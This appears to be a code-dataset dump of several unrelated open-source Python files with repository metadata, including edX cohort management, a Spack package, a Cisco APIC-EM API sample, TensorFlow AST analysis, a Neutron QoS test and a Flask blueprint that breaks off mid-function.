course_user_group = assignment.course_user_group
unregistered_learner = assignment
if course_user_group:
unregistered_learner.delete()
else:
course_user_group = get_random_cohort(course_key)
membership = CohortMembership.objects.create(
user=user,
course_user_group=course_user_group,
)
return cache.setdefault(cache_key, membership.course_user_group)
except IntegrityError as integrity_error:
# An IntegrityError is raised when multiple workers attempt to
# create the same row in one of the cohort model entries:
# CourseCohort, CohortMembership.
log.info(
"HANDLING_INTEGRITY_ERROR: IntegrityError encountered for course '%s' and user '%s': %s",
course_key, user.id, unicode(integrity_error)
)
return get_cohort(user, course_key, assign, use_cached)
def get_random_cohort(course_key):
"""
Helper method to get a cohort for random assignment.
If there are multiple cohorts of type RANDOM in the course, one of them will be randomly selected.
If there are no existing cohorts of type RANDOM in the course, one will be created.
"""
course = courses.get_course(course_key)
cohorts = get_course_cohorts(course, assignment_type=CourseCohort.RANDOM)
if cohorts:
cohort = local_random().choice(cohorts)
else:
cohort = CourseCohort.create(
cohort_name=DEFAULT_COHORT_NAME,
course_id=course_key,
assignment_type=CourseCohort.RANDOM
).course_user_group
return cohort
def migrate_cohort_settings(course):
"""
Migrate all the cohort settings associated with this course from modulestore to mysql.
After that we will never touch modulestore for any cohort related settings.
"""
cohort_settings, created = CourseCohortsSettings.objects.get_or_create(
course_id=course.id,
defaults=_get_cohort_settings_from_modulestore(course)
)
# Add the new and update the existing cohorts
if created:
# Update the manual cohorts already present in CourseUserGroup
manual_cohorts = CourseUserGroup.objects.filter(
course_id=course.id,
group_type=CourseUserGroup.COHORT
).exclude(name__in=course.auto_cohort_groups)
for cohort in manual_cohorts:
CourseCohort.create(course_user_group=cohort)
for group_name in course.auto_cohort_groups:
CourseCohort.create(cohort_name=group_name, course_id=course.id, assignment_type=CourseCohort.RANDOM)
return cohort_settings
def get_course_cohorts(course, assignment_type=None):
"""
Get a list of all the cohorts in the given course. This will include auto cohorts,
regardless of whether or not the auto cohorts include any users.
Arguments:
course: the course for which cohorts should be returned
assignment_type: cohort assignment type
Returns:
A list of CourseUserGroup objects. Empty if there are no cohorts. Does
not check whether the course is cohorted.
"""
# Migrate cohort settings for this course
migrate_cohort_settings(course)
query_set = CourseUserGroup.objects.filter(
course_id=course.location.course_key,
group_type=CourseUserGroup.COHORT
)
query_set = query_set.filter(cohort__assignment_type=assignment_type) if assignment_type else query_set
return list(query_set)
def get_cohort_names(course):
"""Return a dict that maps cohort ids to names for the given course"""
return {cohort.id: cohort.name for cohort in get_course_cohorts(course)}
### Helpers for cohort management views
def get_cohort_by_name(course_key, name):
"""
Return the CourseUserGroup object for the given cohort. Raises DoesNotExist
it isn't present.
"""
return CourseUserGroup.objects.get(
course_id=course_key,
group_type=CourseUserGroup.COHORT,
name=name
)
def get_cohort_by_id(course_key, cohort_id):
"""
Return the CourseUserGroup object for the given cohort. Raises DoesNotExist
it isn't present. Uses the course_key for extra validation.
"""
return CourseUserGroup.objects.get(
course_id=course_key,
group_type=CourseUserGroup.COHORT,
id=cohort_id
)
def add_cohort(course_key, name, assignment_type):
"""
Add a cohort to a course. Raises ValueError if a cohort of the same name already
exists.
"""
log.debug("Adding cohort %s to %s", name, course_key)
if is_cohort_exists(course_key, name):
raise ValueError(_("You cannot create two cohorts with the same name"))
try:
course = courses.get_course_by_id(course_key)
except Http404:
raise ValueError("Invalid course_key")
cohort = CourseCohort.create(
cohort_name=name,
course_id=course.id,
assignment_type=assignment_type
).course_user_group
tracker.emit(
"edx.cohort.creation_requested",
{"cohort_name": cohort.name, "cohort_id": cohort.id}
)
return cohort
def is_cohort_exists(course_key, name):
"""
Check if a cohort already exists.
"""
return CourseUserGroup.objects.filter(course_id=course_key, group_type=CourseUserGroup.COHORT, name=name).exists()
def remove_user_from_cohort(cohort, username_or_email):
"""
Look up the given user, and if successful, remove them from the specified cohort.
Arguments:
cohort: CourseUserGroup
username_or_email: string. Treated as email if has '@'
Raises:
User.DoesNotExist if can't find user.
ValueError if user not already present in this cohort.
"""
user = get_user_by_username_or_email(username_or_email)
try:
membership = CohortMembership.objects.get(course_user_group=cohort, user=user)
membership.delete()
except CohortMembership.DoesNotExist:
raise ValueError("User {} was not present in cohort {}".format(username_or_email, cohort))
def add_user_to_cohort(cohort, username_or_email):
"""
Look up the given user, and if successful, add them to the specified cohort.
Arguments:
cohort: CourseUserGroup
username_or_email: string. Treated as email if has '@'
Returns:
User object (or None if the email address is preassigned),
string (or None) indicating previous cohort,
and whether the user is a preassigned user or not
Raises:
User.DoesNotExist if can't find user. However, if a valid email is provided for the user, it is stored
in a database so that the user can be added to the cohort if they eventually enroll in the course.
ValueError if user already present in this cohort.
ValidationError if an invalid email address is entered.
User.DoesNotExist if a user could not be found.
"""
try:
user = get_user_by_username_or_email(username_or_email)
membership = CohortMembership(course_user_group=cohort, user=user)
membership.save() # This will handle both cases, creation and updating, of a CohortMembership for this user.
tracker.emit(
"edx.cohort.user_add_requested",
{
"user_id": user.id,
"cohort_id": cohort.id,
"cohort_name": cohort.name,
"previous_cohort_id": membership.previous_cohort_id,
"previous_cohort_name": membership.previous_cohort_name,
}
)
return (user, membership.previous_cohort_name, False)
except User.DoesNotExist as ex:
# If username_or_email is an email address, store in database.
try:
validate_email(username_or_email)
try:
assignment = UnregisteredLearnerCohortAssignments.objects.get(
email=username_or_email, course_id=cohort.course_id
)
assignment.course_user_group = cohort
assignment.save()
except UnregisteredLearnerCohortAssignments.DoesNotExist:
assignment = UnregisteredLearnerCohortAssignments.objects.create(
course_user_group=cohort, email=username_or_email, course_id=cohort.course_id
)
tracker.emit(
"edx.cohort.email_address_preassigned",
{
"user_email": assignment.email,
"cohort_id": cohort.id,
"cohort_name": cohort.name,
}
)
return (None, None, True)
except ValidationError as invalid:
if "@" in username_or_email:
raise invalid
else:
raise ex
def get_group_info_for_cohort(cohort, use_cached=False):
"""
Get the ids of the group and partition to which this cohort has been linked
as a tuple of (int, int).
If the cohort has not been linked to any group/partition, both values in the
tuple will be None.
The partition group info is cached for the duration of a request. Pass
use_cached=True to use the cached value instead of fetching from the
database.
"""
cache = request_cache.get_cache(u"cohorts.get_group_info_for_cohort")
cache_key = unicode(cohort.id)
if use_cached and cache_key in cache:
return cache[cache_key]
cache.pop(cache_key, None)
try:
partition_group = CourseUserGroupPartitionGroup.objects.get(course_user_group=cohort)
return cache.setdefault(cache_key, (partition_group.group_id, partition_group.partition_id))
except CourseUserGroupPartitionGroup.DoesNotExist:
pass
return cache.setdefault(cache_key, (None, None))
def set_assignment_type(user_group, assignment_type):
"""
Set assignment type for cohort.
"""
course_cohort = user_group.cohort
if is_last_random_cohort(user_group) and course_cohort.assignment_type != assignment_type:
raise ValueError(_("There must be one cohort to which students can automatically be assigned."))
course_cohort.assignment_type = assignment_type
course_cohort.save()
def get_assignment_type(user_group):
"""
Get assignment type for cohort.
"""
course_cohort = user_group.cohort
return course_cohort.assignment_type
def is_last_random_cohort(user_group):
"""
Check if this cohort is the only random cohort in the course.
"""
random_cohorts = CourseUserGroup.objects.filter(
course_id=user_group.course_id,
group_type=CourseUserGroup.COHORT,
cohort__assignment_type=CourseCohort.RANDOM
)
return len(random_cohorts) == 1 and random_cohorts[0].name == user_group.name
@request_cached
def _get_course_cohort_settings(course_key):
"""
Return cohort settings for a course. NOTE that the only non-deprecated fields in
CourseCohortSettings are `course_id` and `is_cohorted`. Other fields should only be used for
migration purposes.
Arguments:
course_key: CourseKey
Returns:
A CourseCohortSettings object. NOTE that the only non-deprecated field in
CourseCohortSettings are `course_id` and `is_cohorted`. Other fields should only be used
for migration purposes.
Raises:
Http404 if course_key is invalid.
"""
try:
course_cohort_settings = CourseCohortsSettings.objects.get(course_id=course_key)
except CourseCohortsSettings.DoesNotExist:
course = courses.get_course_by_id(course_key)
course_cohort_settings = migrate_cohort_settings(course)
return course_cohort_settings
def get_legacy_discussion_settings(course_key):
try:
course_cohort_settings = CourseCohortsSettings.objects.get(course_id=course_key)
return {
'is_cohorted': course_cohort_settings.is_cohorted,
'cohorted_discussions': course_cohort_settings.cohorted_discussions,
'always_cohort_inline_discussions': course_cohort_settings.always_cohort_inline_discussions
}
except CourseCohortsSettings.DoesNotExist:
course = courses.get_course_by_id(course_key)
return _get_cohort_settings_from_modulestore(course)
def _get_cohort_settings_from_modulestore(course):
return {
'is_cohorted': course.is_cohorted,
'cohorted_discussions': list(course.cohorted_discussions),
'always_cohort_inline_discussions': course.always_cohort_inline_discussions
}
|
pepeportela/edx-platform
|
openedx/core/djangoapps/course_groups/cohorts.py
|
Python
|
agpl-3.0
| 21,299 | 0.002535 |
# Copyright 2013-2020 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class ExuberantCtags(AutotoolsPackage):
"""The canonical ctags generator"""
homepage = "http://ctags.sourceforge.net"
url = "http://downloads.sourceforge.net/project/ctags/ctags/5.8/ctags-5.8.tar.gz"
version('5.8', sha256='0e44b45dcabe969e0bbbb11e30c246f81abe5d32012db37395eb57d66e9e99c7')
|
iulian787/spack
|
var/spack/repos/builtin/packages/exuberant-ctags/package.py
|
Python
|
lgpl-2.1
| 532 | 0.005639 |
# Getting started with APIC-EM APIs
# Follows APIC-EM Basics Learning Lab
# Basics Learning Lab Full example for Get Devices, Get Hosts, Get Policies, Get Applications
# * THIS SAMPLE APPLICATION AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY
# * OF ANY KIND BY CISCO, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
# * TO THE IMPLIED WARRANTIES OF MERCHANTABILITY FITNESS FOR A PARTICULAR
# * PURPOSE, NONINFRINGEMENT, SATISFACTORY QUALITY OR ARISING FROM A COURSE OF
# * DEALING, LAW, USAGE, OR TRADE PRACTICE. CISCO TAKES NO RESPONSIBILITY
# * REGARDING ITS USAGE IN AN APPLICATION, AND IT IS PRESENTED ONLY AS AN
# * EXAMPLE. THE SAMPLE CODE HAS NOT BEEN THOROUGHLY TESTED AND IS PROVIDED AS AN
# * EXAMPLE ONLY, THEREFORE CISCO DOES NOT GUARANTEE OR MAKE ANY REPRESENTATIONS
# * REGARDING ITS RELIABILITY, SERVICEABILITY, OR FUNCTION. IN NO EVENT DOES
# * CISCO WARRANT THAT THE SOFTWARE IS ERROR FREE OR THAT CUSTOMER WILL BE ABLE
# * TO OPERATE THE SOFTWARE WITHOUT PROBLEMS OR INTERRUPTIONS. NOR DOES CISCO
# * WARRANT THAT THE SOFTWARE OR ANY EQUIPMENT ON WHICH THE SOFTWARE IS USED WILL
# * BE FREE OF VULNERABILITY TO INTRUSION OR ATTACK. THIS SAMPLE APPLICATION IS
# * NOT SUPPORTED BY CISCO IN ANY MANNER. CISCO DOES NOT ASSUME ANY LIABILITY
# * ARISING FROM THE USE OF THE APPLICATION. FURTHERMORE, IN NO EVENT SHALL CISCO
# * OR ITS SUPPLIERS BE LIABLE FOR ANY INCIDENTAL OR CONSEQUENTIAL DAMAGES, LOST
# * PROFITS, OR LOST DATA, OR ANY OTHER INDIRECT DAMAGES EVEN IF CISCO OR ITS
# * SUPPLIERS HAVE BEEN INFORMED OF THE POSSIBILITY THEREOF.-->
# import the requests library so we can use it to make REST calls (http://docs.python-requests.org/en/latest/index.html)
import requests
# import the json library. This library provides handy features for formatting, displaying
# and manipulating json.
import json
# All of our REST calls will use the url for the APIC EM Controller as the base URL
# So lets define a variable for the controller IP or DNS so we don't have to keep typing it
controller_url = "http://sandboxapic.cisco.com/"
# Get Devices
# This function allows you to view a list of all the devices in the network(routers and switches).
get_devices_url = controller_url + 'api/v0/network-device'
#Perform GET on get_devices_url and load response into a json object
get_devices_response = requests.get(get_devices_url)
get_devices_json = get_devices_response.json()
#Now let's read and display some specific information from the json
# set our parent as the top level response object
parent = get_devices_json["response"]
print ("Devices = ")
# for each device returned, print the networkDeviceId
for item in parent:
print (item["id"])
# Get Hosts
# This function allows you to view a list of all the hosts in the network.
get_hosts_url = controller_url + 'api/v0/host'
#Perform GET on get_hosts_url and load response into a json object
get_hosts_response = requests.get(get_hosts_url)
get_hosts_json = get_hosts_response.json()
#Now let's read and display some specific information from the json
# set our parent as the top level response object
hosts_parent = get_hosts_json["response"]
print ("Hosts= ")
# for each device returned, print the networkDeviceId
for item in hosts_parent:
print (item["hostIp"])
# Get Policies
# This function allows you to view a list of all the policies in the network.
get_policies_url = controller_url + 'api/v0/policy'
#Perform GET on get_hosts_url and load response into a json object
get_policies_response = requests.get(get_policies_url)
get_policies_json = get_policies_response.json()
#Now let's read and display some specific information from the json
# set our parent as the top level response object
policies_parent = get_policies_json["response"]
print ("Policies= ")
# for each device returned, print the networkDeviceId
for item in policies_parent:
print (item["id"])
# Get Applications
# This function allows you to view a list of all the applications in the network.
get_apps_url = controller_url + 'api/v0/application'
#Perform GET on get_hosts_url and load response into a json object
get_apps_response = requests.get(get_apps_url)
get_apps_json = get_apps_response.json()
#Now let's read and display some specific information from the json
# set our parent as the top level response object
apps_parent = get_apps_json["response"]
print ("Applications= ")
# for each device returned, print the networkDeviceId
for item in apps_parent:
print (item["name"])
|
SivagnanamCiena/coding-skills-sample-code
|
coding102-REST-python/learning-lab-basics-step3.py
|
Python
|
apache-2.0
| 4,557 | 0.010753 |
#!/usr/bin/env python
import click
import logging
import os
import pagoda
import pagoda.viewer
def full(name):
return os.path.join(os.path.dirname(__file__), name)
@click.command()
def main():
logging.basicConfig()
w = pagoda.cooper.World(dt=1. / 120)
w.load_skeleton(full('../optimized-skeleton.txt'))
w.load_markers(full('cooper-motion.c3d'), full('../optimized-markers.txt'))
pagoda.viewer.Viewer(w).run()
if __name__ == '__main__':
main()
|
EmbodiedCognition/pagoda
|
examples/cooper.py
|
Python
|
mit
| 478 | 0 |
# module for the Container List <dsc>
import xml.etree.cElementTree as ET
from components import components
import globals
import wx
from messages import error
from mixed_content import mixed_content
def dsc(dsc_root, FASheet, version):
from wx.lib.pubsub import pub
wx.CallAfter(pub.sendMessage, "update_spread", msg="Reading <dsc>...")
if dsc_root.find('c/c') is None:
if dsc_root.find('c01/c02') is None:
number = "noseries"
else:
number = "c01"
else:
number = "c"
"""
for top_series in dsc_root:
if top_series.find('did/unittitle') is None:
wx.CallAfter(pub.sendMessage, "update_spread", msg="Reading series...")
else:
wx.CallAfter(pub.sendMessage, "update_spread", msg="Reading " + top_series.find('did/unittitle').text + "...")
"""
if number == "c":
child_tag = "c"
cmpnt_count = 0
if dsc_root.iterfind('c/c') is None:
#Collection does not have series
FASheet.find('CollectionSheet/CollectionMap/Component/ComponentName').text = "noseries"
cmpnt_count = cmpnt_count + 1
level = "1"
components(dsc_root, FASheet.find('CollectionSheet'), FASheet.find('Series' + str(cmpnt_count)), level, child_tag, version)
else:
#Collection has series
FASheet.find('CollectionSheet/CollectionMap').clear()
for component in dsc_root.iter('c'):
if component.find('c') is None:
pass
else:
cmpnt_count = cmpnt_count + 1
Component_element = ET.Element('Component')
FASheet.find('CollectionSheet/CollectionMap').append(Component_element)
ComponentLevel_element = ET.Element('ComponentLevel')
Component_element.append(ComponentLevel_element)
ComponentNumber_element = ET.Element('ComponentNumber')
Component_element.append(ComponentNumber_element)
ComponentName_element = ET.Element('ComponentName')
Component_element.append(ComponentName_element)
if component in dsc_root.iterfind('c'):
level = "1"
elif component in dsc_root.iterfind('c/c'):
level = "2"
elif component in dsc_root.iterfind('c/c/c'):
level = "3"
elif component in dsc_root.iterfind('c/c/c'):
level = "4"
elif component in dsc_root.iterfind('c/c/c/c'):
level = "5"
elif component in dsc_root.iterfind('c/c/c/c/c'):
level = "6"
elif component in dsc_root.iterfind('c/c/c/c/c/c'):
level = "7"
elif component in dsc_root.iterfind('c/c/c/c/c/c/c'):
level = "8"
elif component in dsc_root.iterfind('c/c/c/c/c/c/c/c'):
level = "9"
elif component in dsc_root.iterfind('c/c/c/c/c/c/c/c/c'):
level = "10"
elif component in dsc_root.iterfind('c/c/c/c/c/c/c/c/c/c'):
level = "11"
elif component in dsc_root.iterfind('c/c/c/c/c/c/c/c/c/c/c'):
level = "12"
ComponentLevel_element.text = level
if component.find('did') is None:
pass
else:
if component.find('did/unitid') is None:
if "id" in component.attrib:
ComponentNumber_element.text = component.attrib['id']
elif "id" in component.find('did').attrib:
ComponentNumber_element.text = component.find('did').attrib['id']
else:
ComponentNumber_element.text = mixed_content(component.find('did/unitid'))
if component.find('did/unittitle') is None:
pass
else:
ComponentName_element.text = mixed_content(component.find('did/unittitle'))
if cmpnt_count > 51:
pass
elif cmpnt_count == 51:
error("EADMachine can only read up to 50 series and subseries. Since your collection has more than 50 series and subseries, only the first 50 will be read.", False)
else:
components(component, FASheet.find('CollectionSheet'), FASheet.find('Series' + str(cmpnt_count)), level, child_tag, version)
elif number == "c01":
cmpnt_count = 0
if dsc_root.iter('c02') is None:
#Collection does not have series
FASheet.find('CollectionSheet/CollectionMap/Component/ComponentName').text = "noseries"
cmpnt_count = cmpnt_count + 1
level = "1"
components(dsc_root, FASheet.find('CollectionSheet'), FASheet.find('Series' + str(cmpnt_count)), level, child_tag, version)
else:
#Collection has series
FASheet.find('CollectionSheet/CollectionMap').clear()
for component in dsc_root.iter():
if component.tag == 'c01' or component.tag == 'c02' or component.tag == 'c03' or component.tag == 'c04' or component.tag == 'c05' or component.tag == 'c06' or component.tag == 'c07' or component.tag == 'c08' or component.tag == 'c09' or component.tag == 'c10' or component.tag == 'c11' or component.tag == 'c12':
child_tag_name = component.tag[1:]
if int(child_tag_name) < 10:
child_tag = "c0" + str(int(child_tag_name) + 1)
else:
child_tag = "c" + str(int(child_tag_name) + 1)
if component.find(child_tag) is None:
pass
else:
cmpnt_count = cmpnt_count + 1
Component_element = ET.Element('Component')
FASheet.find('CollectionSheet/CollectionMap').append(Component_element)
ComponentLevel_element = ET.Element('ComponentLevel')
Component_element.append(ComponentLevel_element)
ComponentNumber_element = ET.Element('ComponentNumber')
Component_element.append(ComponentNumber_element)
ComponentName_element = ET.Element('ComponentName')
Component_element.append(ComponentName_element)
level = "0"
if component.tag == 'c01':
level = "1"
elif component.tag == 'c02':
level = "2"
elif component.tag == 'c03':
level = "3"
elif component.tag == 'c04':
level = "4"
elif component.tag == 'c05':
level = "5"
elif component.tag == 'c06':
level = "6"
elif component.tag == 'c07':
level = "7"
elif component.tag == 'c08':
level = "8"
elif component.tag == 'c09':
level = "9"
elif component.tag == 'c10':
level = "10"
elif component.tag == 'c11':
level = "11"
elif component.tag == 'c12':
level = "12"
ComponentLevel_element.text = level
if component.find('did') is None:
pass
else:
if component.find('did/unitid') is None:
if "id" in component.attrib:
ComponentNumber_element.text = component.attrib['id']
elif "id" in component.find('did').attrib:
ComponentNumber_element.text = component.find('did').attrib['id']
else:
ComponentNumber_element.text = mixed_content(component.find('did/unitid'))
if component.find('did/unittitle') is None:
pass
else:
ComponentName_element.text = mixed_content(component.find('did/unittitle'))
if cmpnt_count > 51:
pass
elif cmpnt_count == 51:
error("EADMachine can only read up to 50 series and subseries. Since your collection has more than 50 series and subseries, only the first 50 will be read.", False)
else:
components(component, FASheet.find('CollectionSheet'), FASheet.find('Series' + str(cmpnt_count)), level, child_tag, version)
elif number == "noseries":
cmpnt_count = 0
#Collection does not have series
FASheet.find('CollectionSheet/CollectionMap/Component/ComponentName').text = "noseries"
cmpnt_count = 1
level = "1"
components(dsc_root, FASheet.find('CollectionSheet'), FASheet.find('Series' + str(cmpnt_count)), level, "c", version)
|
gwiedeman/eadmachine
|
source/EADtoSpreadsheet/func/dsc.py
|
Python
|
unlicense
| 7,348 | 0.02613 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# This file is part of overview archive.
# Copyright © 2015 seamus tuohy, <stuohy@internews.org>
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License as published by the Free
# Software Foundation, either version 3 of the License, or (at your option)
# any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the included LICENSE file for details.
# identification
from os import path
from os.path import abspath
from urllib.parse import urlparse
from urllib.request import urlopen
import magic
from urllib.error import HTTPError
# logging
import logging
log = logging.getLogger("oa.{0}".format(__name__))
def filetype(file_path):
if path.exists(file_path) and path.isfile(file_path):
try:
file_type = magic.from_file(abspath(file_path), mime=True)
except IOError:
log.error("{0} is not a valid file".format(file_path))
raise IOError("{0} is not a valid file".format(file_path))
else:
log.error("{0} is not a valid path to a file".format(file_path))
raise IOError("{0} is not a valid path to a file".format(file_path))
log.debug("filetype for {0} identified as {1}".format(file_path, file_type))
return file_type
def is_url(link):
try:
site = urlopen(link)
return True
except (ValueError, HTTPError):
return False
return False
def is_archive(link):
try:
parsed_url = urlparse(link)
if parsed_url.netloc == 'web.archive.org':
return True
except ValueError:
return False
return False
|
elationfoundation/overview_archive
|
overview_archive/utils/identify.py
|
Python
|
gpl-2.0
| 1,836 | 0.001635 |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Live value resolution.
Live values are extracted from the known execution context.
Requires activity analysis annotations.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gast
from tensorflow.contrib.py2tf.pyct import anno
from tensorflow.contrib.py2tf.pyct import transformer
from tensorflow.contrib.py2tf.pyct.static_analysis.annos import NodeAnno
class LiveValueResolver(transformer.Base):
"""Annotates nodes with live values."""
def __init__(self, context, literals):
super(LiveValueResolver, self).__init__(context)
self.literals = literals
def visit_ClassDef(self, node):
self.generic_visit(node)
anno.setanno(node, 'live_val', self.context.namespace[node.name])
return node
def visit_Name(self, node):
self.generic_visit(node)
if isinstance(node.ctx, gast.Load):
assert anno.hasanno(node, NodeAnno.IS_LOCAL), node
symbol_is_local = anno.getanno(node, NodeAnno.IS_LOCAL)
assert anno.hasanno(node, NodeAnno.IS_MODIFIED_SINCE_ENTRY), node
symbol_is_modified = anno.getanno(node, NodeAnno.IS_MODIFIED_SINCE_ENTRY)
assert anno.hasanno(node, NodeAnno.IS_PARAM), node
symbol_is_param = anno.getanno(node, NodeAnno.IS_PARAM)
if not symbol_is_local and not symbol_is_param:
if node.id in self.literals:
anno.setanno(node, 'live_val', self.literals[node.id])
elif node.id in self.context.namespace:
obj = self.context.namespace[node.id]
anno.setanno(node, 'live_val', obj)
if hasattr(obj, '__name__'):
# If the symbol value is for example a primitive, then it will not
# have a name.
anno.setanno(node, 'fqn', (obj.__name__,))
else:
pass
# TODO(mdan): Should we raise an error here?
# Can encounter this when:
# * a symbol truly lacks reference
# * a symbol is new, like the new name of a function we just renamed.
else:
pass
# TODO(mdan): Attempt to trace its value through the local chain.
# TODO(mdan): Use type annotations as fallback.
if not symbol_is_modified:
if node.id in self.context.arg_values:
obj = self.context.arg_values[node.id]
anno.setanno(node, 'live_val', obj)
anno.setanno(node, 'fqn', (obj.__class__.__name__,))
return node
def visit_Attribute(self, node):
self.generic_visit(node)
if anno.hasanno(node.value, 'live_val'):
assert anno.hasanno(node.value, 'fqn')
parent_object = anno.getanno(node.value, 'live_val')
if not hasattr(parent_object, node.attr):
raise AttributeError('%s has no attribute %s' % (parent_object,
node.attr))
anno.setanno(node, 'parent_type', type(parent_object))
anno.setanno(node, 'live_val', getattr(parent_object, node.attr))
anno.setanno(node, 'fqn', anno.getanno(node.value, 'fqn') + (node.attr,))
# TODO(mdan): Investigate the role built-in annotations can play here.
elif anno.hasanno(node.value, 'type'):
parent_type = anno.getanno(node.value, 'type')
if hasattr(parent_type, node.attr):
# This should hold for static members like methods.
# This would not hold for dynamic members like function attributes.
# For the dynamic case, we simply leave the node without an annotation,
# and let downstream consumers figure out what to do.
anno.setanno(node, 'parent_type', parent_type)
anno.setanno(node, 'live_val', getattr(parent_type, node.attr))
anno.setanno(node, 'fqn',
anno.getanno(node.value, 'type_fqn') + (node.attr,))
elif isinstance(node.value, gast.Name):
stem_name = node.value
# All nonlocal symbols should be fully resolved.
assert anno.hasanno(stem_name, NodeAnno.IS_LOCAL), stem_name
# TODO(mdan): Figure out what to do when calling attribute on local object
# Maybe just leave as-is?
return node
def resolve(node, context, literals):
return LiveValueResolver(context, literals).visit(node)
|
Xeralux/tensorflow
|
tensorflow/contrib/py2tf/pyct/static_analysis/live_values.py
|
Python
|
apache-2.0
| 4,891 | 0.008587 |
# Copyright 2015 Mellanox Technologies, Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from oslo_utils import uuidutils
from neutron import context
from neutron.objects.qos import policy
from neutron.objects.qos import rule
from neutron.plugins.ml2.drivers.mech_sriov.agent.common import exceptions
from neutron.plugins.ml2.drivers.mech_sriov.agent.extension_drivers import (
qos_driver)
from neutron.tests import base
class QosSRIOVAgentDriverTestCase(base.BaseTestCase):
ASSIGNED_MAC = '00:00:00:00:00:66'
PCI_SLOT = '0000:06:00.1'
def setUp(self):
super(QosSRIOVAgentDriverTestCase, self).setUp()
self.context = context.get_admin_context()
self.qos_driver = qos_driver.QosSRIOVAgentDriver()
self.qos_driver.initialize()
self.qos_driver.eswitch_mgr = mock.Mock()
self.qos_driver.eswitch_mgr.set_device_max_rate = mock.Mock()
self.max_rate_mock = self.qos_driver.eswitch_mgr.set_device_max_rate
self.rule = self._create_bw_limit_rule_obj()
self.qos_policy = self._create_qos_policy_obj([self.rule])
self.port = self._create_fake_port()
def _create_bw_limit_rule_obj(self):
rule_obj = rule.QosBandwidthLimitRule()
rule_obj.id = uuidutils.generate_uuid()
rule_obj.max_kbps = 2
rule_obj.max_burst_kbps = 200
rule_obj.obj_reset_changes()
return rule_obj
def _create_qos_policy_obj(self, rules):
policy_dict = {'id': uuidutils.generate_uuid(),
'tenant_id': uuidutils.generate_uuid(),
'name': 'test',
'description': 'test',
'shared': False,
'rules': rules}
policy_obj = policy.QosPolicy(self.context, **policy_dict)
policy_obj.obj_reset_changes()
return policy_obj
def _create_fake_port(self):
return {'port_id': uuidutils.generate_uuid(),
'profile': {'pci_slot': self.PCI_SLOT},
'device': self.ASSIGNED_MAC}
def test_create_rule(self):
self.qos_driver.create(self.port, self.qos_policy)
self.max_rate_mock.assert_called_once_with(
self.ASSIGNED_MAC, self.PCI_SLOT, self.rule.max_kbps)
def test_update_rule(self):
self.qos_driver.update(self.port, self.qos_policy)
self.max_rate_mock.assert_called_once_with(
self.ASSIGNED_MAC, self.PCI_SLOT, self.rule.max_kbps)
def test_delete_rules(self):
self.qos_driver.delete(self.port, self.qos_policy)
self.max_rate_mock.assert_called_once_with(
self.ASSIGNED_MAC, self.PCI_SLOT, 0)
def test__set_vf_max_rate_captures_sriov_failure(self):
self.max_rate_mock.side_effect = exceptions.SriovNicError()
self.qos_driver._set_vf_max_rate(self.ASSIGNED_MAC, self.PCI_SLOT)
def test__set_vf_max_rate_unknown_device(self):
with mock.patch.object(self.qos_driver.eswitch_mgr, 'device_exists',
return_value=False):
self.qos_driver._set_vf_max_rate(self.ASSIGNED_MAC, self.PCI_SLOT)
self.assertFalse(self.max_rate_mock.called)
|
mmnelemane/neutron
|
neutron/tests/unit/plugins/ml2/drivers/mech_sriov/agent/extension_drivers/test_qos_driver.py
|
Python
|
apache-2.0
| 3,672 | 0.001362 |
"""
mod_customized Controllers
===================
In this module, users can test their fork branch with customized set of regression tests
"""
from flask import Blueprint, g, request, redirect, url_for, flash
from github import GitHub, ApiError
from datetime import datetime, timedelta
from decorators import template_renderer, get_menu_entries
from mod_auth.controllers import login_required, check_access_rights
from mod_auth.models import Role, User
from mod_test.models import Fork, Test, TestType, TestPlatform
from mod_customized.forms import TestForkForm
from mod_customized.models import TestFork, CustomizedTest
from mod_regression.models import Category, regressionTestLinkTable, RegressionTest
from mod_test.controllers import get_data_for_test, TestNotFoundException
from mod_auth.controllers import fetch_username_from_token
from sqlalchemy import and_
mod_customized = Blueprint('custom', __name__)
@mod_customized.before_app_request
def before_app_request():
if g.user is not None:
g.menu_entries['custom'] = {
'title': 'Customize Test',
'icon': 'code-fork',
'route': 'custom.index',
'access': [Role.tester, Role.contributor, Role.admin]
}
@mod_customized.route('/', methods=['GET', 'POST'])
@login_required
@check_access_rights([Role.tester, Role.contributor, Role.admin])
@template_renderer()
def index():
"""
Display a form to allow users to run tests.
User can enter commit or select the commit from their repo that are not more than 30 days old.
User can customized test based on selected regression tests and platforms.
Also Display list of customized tests started by user.
User will be redirected to the same page on submit.
"""
fork_test_form = TestForkForm(request.form)
username = fetch_username_from_token()
commit_options = False
if username is not None:
gh = GitHub(access_token=g.github['bot_token'])
repository = gh.repos(username)(g.github['repository'])
# Only commits since last month
last_month = datetime.now() - timedelta(days=30)
commit_since = last_month.isoformat() + 'Z'
commits = repository.commits().get(since=commit_since)
commit_arr = []
for commit in commits:
commit_url = commit['html_url']
commit_sha = commit['sha']
commit_option = (
'<a href="{url}">{sha}</a>').format(url=commit_url, sha=commit_sha)
commit_arr.append((commit_sha, commit_option))
# If there are commits present, display it on webpage
if len(commit_arr) > 0:
fork_test_form.commit_select.choices = commit_arr
